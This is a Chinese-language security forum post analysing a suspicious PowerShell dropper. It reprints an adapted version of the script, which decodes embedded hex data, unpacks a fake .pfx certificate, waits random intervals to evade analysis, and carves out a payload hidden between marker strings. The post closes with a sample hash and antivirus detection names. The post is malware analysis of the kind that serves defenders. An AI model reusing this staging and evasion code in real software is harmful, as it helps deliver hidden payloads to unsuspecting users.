可疑ps1脚本

呼啸山庄

图钉鱼 发表于 2025-6-10 23:04
这段PowerShell脚本执行明显的恶意特征：

1. 创建隐藏目录：在%APPDATA%\Microsoft\Credentials创建暂存 ...

喵，我是直接改原本的ps1搞出来的。md5: 8d5efb1a0fa37e96bf12fa6789017ecf  LightYellow4.pfx

1. # 从加密数据中解密出证书压缩包
   
2. $stagingDir = "."
   
3. if (-not (Test-Path $stagingDir)) {
   
4.     New-Item -ItemType Directory -Path $stagingDir -Force | Out-Null
   
5. }
   
6. 
   
7. $zipPath = Join-Path $stagingDir 'LightYellow4.zip'
   
8. $data = [byte[]]::new($hexData.Length/2)
   
9. for($i=0; $i -lt $data.Length; $i++) {
   
10.     $data[$i] = [Convert]::ToByte($hexData.Substring($i*2,2),16)
    
11. }
    
12. [IO.File]::WriteAllBytes($zipPath, $data)
    
13. 
    
14. # 睡眠
    
15. Start-Sleep -Seconds (Get-Random -Minimum 4 -Maximum 9)
    
16. 
    
17. # 解压出证书
    
18. $extractPath = $stagingDir
    
19. Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force
    
20. 
    
21. # 睡眠
    
22. Start-Sleep -Seconds (Get-Random -Minimum 3 -Maximum 7)
    
23. 
    
24. # 解压恶意文件
    
25. $drvFile = Join-Path $extractPath 'LightYellow4.pfx'
    
26. $drvContent = [IO.File]::ReadAllBytes($drvFile)
    
27. 
    
28. $startMarker = [byte[]]([System.Text.Encoding]::ASCII.GetBytes("<<MARINA_START>>"))
    
29. $endMarker = [byte[]]([System.Text.Encoding]::ASCII.GetBytes("<<MARINA_END>>"))
    
30. 
    
31. $startIndex = -1
    
32. $endIndex = -1
    
33. 
    
34. for ($i = 0; $i -lt ($drvContent.Length - $startMarker.Length); $i++) {
    
35.     $match = $true
    
36.     for ($j = 0; $j -lt $startMarker.Length; $j++) {
    
37.         if ($drvContent[$i + $j] -ne $startMarker[$j]) {
    
38.             $match = $false
    
39.             break
    
40.         }
    
41.     }
    
42.     if ($match) {
    
43.         $startIndex = $i
    
44.         break
    
45.     }
    
46. }
    
47. 
    
48. for ($i = 0; $i -lt ($drvContent.Length - $endMarker.Length); $i++) {
    
49.     $match = $true
    
50.     for ($j = 0; $j -lt $endMarker.Length; $j++) {
    
51.         if ($drvContent[$i + $j] -ne $endMarker[$j]) {
    
52.             $match = $false
    
53.             break
    
54.         }
    
55.     }
    
56.     if ($match) {
    
57.         $endIndex = $i + $endMarker.Length
    
58.         break
    
59.     }
    
60. }
    
61. 
    
62. $cleanDrvContent = if ($startIndex -ne -1 -and $endIndex -ne -1) {
    
63.     $secondStartIndex = -1
    
64.     for ($i = $endIndex; $i -lt ($drvContent.Length - $startMarker.Length); $i++) {
    
65.         $match = $true
    
66.         for ($j = 0; $j -lt $startMarker.Length; $j++) {
    
67.             if ($drvContent[$i + $j] -ne $startMarker[$j]) {
    
68.                 $match = $false
    
69.                 break
    
70.             }
    
71.         }
    
72.         if ($match) {
    
73.             $secondStartIndex = $i
    
74.             break
    
75.         }
    
76.     }
    
77.    
    
78.     if ($secondStartIndex -ne -1) {
    
79.         $drvContent[$endIndex..$secondStartIndex]
    
80.     } else {
    
81.         $drvContent[$endIndex..$drvContent.Length]
    
82.     }
    
83. } else {
    
84.     $drvContent
    
85. }
    
86. 
    
87. Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 5)
    
88. 
    
89. [IO.File]::WriteAllBytes($drvFile, $cleanDrvContent)

复制代码

ANY.LNK

微软触发自动上报，后报告Trojan:Script/Wacatac.H!ml
两个DLL均自动上报4eaaf5f985f897a926fa85b08f0c8495c560ef1b1d62d34e84ab2def767f4714报告Trojan:Win32/Cloxer，另一个机器学习Trojan:Win32/Wacatac.H!ml